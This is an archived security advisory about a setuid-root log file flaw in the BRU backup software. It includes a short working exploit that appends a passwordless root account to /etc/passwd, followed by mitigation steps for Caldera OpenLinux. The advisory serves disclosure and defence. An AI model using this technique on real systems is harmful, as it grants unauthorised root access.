Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: bru-1.htm

Bru backup software logfile exploit



    Those using bru


    Riley Hassell found  a vulnerability in  BRU during his  'Security
    Contest' for his company.  BRU is backup software.

    You can change  the log file  BRU uses by  changing the BRUEXECLOG
    environment variable.  Since bru is setuid root you can append  to
    any file on the system.


        $ BRUEXECLOG=/etc/passwd
        $ export BRUEXECLOG
        $ bru -V '
        > comsec::0:0::/:/bin/sh
        > '
        $ su comsec


    By default, BRU  is installed setuid  root.  If  it isn't, and  is
    run by a non-root user, it complains:

        bru: [W171] warning - BRU must be owned by root and have suid bit set

    Many (most) users  who install BRU  probably never think  to check
    if its installed setuid.  Should  it be?  Probably not, but  it is
    a very real vulnerability under a default install.

    Solution for Caldera OpenLinux:

        - If you do not need BRU, issue as root: rpm -e BRU
        - Otherwise remove the suid-root bit by issuing as root: chmod u-s /bru/bru /bin/bru
        - If you want to use BRU  as a normal user, you have to  point
          the 'BRUEXECLOG' environment variable to a file writeable by
          the user, like
            export BRUEXECLOG

            setenv BRUEXECLOG=~/.brulog

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH